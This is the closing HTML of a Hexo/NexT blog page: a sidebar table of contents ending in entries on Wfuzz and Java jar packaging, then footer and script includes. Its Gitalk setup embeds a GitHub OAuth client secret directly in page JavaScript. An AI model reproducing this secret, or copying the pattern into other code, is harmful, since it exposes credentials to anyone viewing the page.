class="nav-number">2.1.6.6.</span> <span class="nav-text">Wfuzz</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#java项目打包成jar"><span class="nav-number">2.1.6.7.</span> <span class="nav-text">java项目打包成jar</span></a></li></ol></li></ol></li></ol></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      
        <div class="back-to-top">
          <i class="fa fa-arrow-up"></i>
          
            <span id="scrollpercent"><span>0</span>%</span>
          
        </div>
      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2023</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">lego</span>

  
</div>


  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Pisces</div>




        
<div class="busuanzi-count">
  <script async src="https://dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js"></script>

  

  
</div>








        
      </div>
    </footer>

    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.4"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  <link rel="stylesheet" href="https://unpkg.com/gitalk/dist/gitalk.css">
  <script src="https://unpkg.com/gitalk/dist/gitalk.min.js"></script>
   <script type="text/javascript">
        var gitalk = new Gitalk({
          clientID: '76aae4c57ee7f811d638',
          clientSecret: 'd6d32a0bf34087bf9ee31a1a74fd5bd72cc23c92',
          repo: 'legoc.github.io',
          owner: 'legoc',
          admin: ['legoc'],
          id: decodeURI(window.location.pathname),
          distractionFreeMode: 'true'
        })
        gitalk.render('gitalk-container')           
       </script>
	   
	   
	   




  





  

  

  

  
  

  

  

  

</body>
</html>
